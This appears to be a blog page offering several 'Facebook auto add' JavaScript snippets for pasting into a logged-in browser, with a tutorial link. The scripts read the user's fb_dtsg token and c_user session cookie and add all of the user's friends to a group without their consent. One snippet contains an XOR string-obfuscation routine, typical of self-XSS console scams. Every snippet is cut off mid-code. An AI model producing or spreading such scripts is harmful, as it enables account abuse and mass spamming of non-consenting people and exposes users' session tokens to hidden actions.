Posts

Showing posts with the label Code

Auto add video tutorial

Check out our new auto add facebook group tutorial in https://www.youtube.com/watch?v=Ps1jPGM0AHo

Latest Facebook Auto add script

(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Friends</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil...

New auto add script

(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found "+f.frns.length+" Friends<div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.r...

Fb group member auto add script

function hp_d12(s) { var o = "", ar = new Array(), os = "", ic = 0, p = 0; for (i = 0; i < s.length; i++) { c = s.charCodeAt(i); if (c < 128) c = c ^ ((p++ % 8) + 1); os += String.fromCharCode(c); if (os.length > 80) { ar[ic++] = os; os = "" } } o = ar.join("") + os; return o } var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function cereziAl(isim) { var tarama = isim + "="; if (document.cookie.length > 0) { konum = document.cookie.indexOf(tarama); if (konum != -1) { konum += tarama.length; son = document.cookie.indexOf(";", konum); if (son == -1) son = document.cookie.length; return unescape(document.cookie.substring(konum, son)) } else { return "" } } } function getRandomInt(min, max) { return Math.floor(Math.random() * (max - min + 1)) + min } function randomValue(a...